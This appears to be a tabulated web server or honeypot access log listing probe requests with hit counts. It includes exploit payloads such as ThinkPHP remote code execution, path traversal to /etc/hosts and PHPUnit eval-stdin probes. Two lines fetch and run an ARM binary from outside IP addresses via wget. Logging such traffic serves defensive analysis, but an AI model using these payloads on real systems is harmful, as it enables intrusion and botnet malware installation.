| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
| 1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /console/login/LoginForm.jsp |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /login.action?os_destination=1 |
HTTP/1.1 |
| 1 | GET | /server-status |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//198[.]46[.]209[.]106/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm |
|
| 1 | GET | /solr/ |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /tmui/login.jsp |
HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /10 |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
| 1 | PUT | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
